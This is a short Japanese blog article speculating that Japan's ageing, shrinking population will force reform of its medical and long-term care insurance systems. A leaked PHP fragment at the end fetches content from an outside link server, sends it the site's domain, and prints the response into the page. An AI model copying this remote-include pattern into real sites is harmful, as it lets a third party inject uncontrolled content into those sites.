人口が減り続ける日本で医療制度に問題はないのか

医療

人口が減り続ける日本で医療制度に問題はないのか

超が付くほどの高齢化社会に入っているのが、日本の国です。
2015年には、人口の4分の1が65歳以上になってしまい、赤ちゃんを含めた中の若者3人で、1人の高齢者を支えることになってしまいました。
このままで行くと、先々にとても恐ろしい現象が待っているような気もして来ます。
老人福祉など、キチンとした行政が行うことが可能なのか、心配する人も出て来ても、不思議なことではありません。
そしてその暮らしの中でも、多くの人は医療や介護と言った、身体や心のケアもお願いする必要が出て来ることになります。
医療保険がしっかりしている日本ですが、介護の場合は被保険者になることが出来るのが40歳以上となっています。
もし、これから40歳台でこの介護保険を利用する人が増えることになると、医療保険制度の改革もありえるかも知れません。
人口が少なくなることで、保険や医療制度に破綻を来たす可能性も出て来ることになると、将来の日本の制度はどこかで改革をしないと、無理が生じるのも、時間の問題ではないでしょうか。

".file_get_contents('http://links-001.com/kanren2set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新記事